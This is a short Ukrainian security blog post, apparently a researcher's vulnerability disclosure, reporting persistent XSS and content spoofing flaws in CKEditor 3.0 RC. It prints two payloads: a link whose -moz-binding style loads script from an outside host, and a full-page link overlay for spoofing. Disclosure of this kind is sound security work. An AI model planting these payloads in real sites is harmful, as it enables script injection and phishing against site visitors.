Websecurity - Веб безпека

08.07.2009

Сьогодні я знайшов Cross-Site Scripting та Content Spoofing уразливості в CKEditor. Про що найближчим часом повідомлю розробникам редактора (які є також розробниками FCKeditor).

Дані уразливості аналогічні уразливостям в FCKeditor, про які я писав раніше.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатка.

26.09.2009

XSS:

В CKEditor 3.0 RC є Persistent XSS уразливість, що дозволяє розміщувати XSS код на сайтах, які його використовуть. Атака (в Mozilla і Firefox) відбувається через розміщення лінки з вказанням стилю:

<a href="http://test" style="-moz-binding:url('http://site/xss.xml#xss')">test</a>

Content Spoofing:

Це Persistent Content Spoofing уразливість.

<a href="http://websecurity.com.ua" style="width:100%;height:100%;display:block;position:absolute;top:0px;left:0px">&nbsp;</a>

Дані уразливості в самому редакторі, тому їх можна використати на будь-якому сайті, що використовує CKEditor в якості редактора для веб форм.

Уразливі CKEditor 3.0 RC та попередні версії.

This entry was posted on 19:27 26.09.2009 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.